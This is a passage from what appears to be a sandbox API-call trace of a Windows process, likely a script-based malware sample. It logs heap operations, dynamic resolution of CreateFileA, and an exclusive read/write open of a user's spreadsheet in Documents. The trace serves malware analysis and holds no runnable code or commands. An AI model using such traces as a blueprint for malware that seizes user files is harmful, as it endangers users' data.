wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0171.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0171.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0171.227] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0171.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0171.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0171.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0171.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0171.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0171.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0171.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0171.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0171.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0171.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0171.228] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0171.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0171.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0171.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0171.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0171.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0171.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0171.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0171.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0171.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0171.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0171.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0171.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0171.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0171.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0171.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0171.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0171.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0171.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0171.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0171.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0171.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0171.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0171.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0171.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0171.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0171.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0171.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0171.232] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0171.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0171.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0171.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0171.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0171.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.263] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0171.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bdae0 [0171.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bdae0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0171.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.264] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0171.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0171.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdae0 [0171.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bdae0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0171.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.265] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0171.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0171.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0171.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0171.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0171.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0171.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0171.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x39) returned 0x8db0a8 [0171.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods", cchWideChar=57, lpMultiByteStr=0x8db0a8, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods", lpUsedDefaultChar=0x0) returned 57 [0171.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0171.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0171.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.267] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kqvkybnjluto.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0171.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0171.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0171.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0171.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 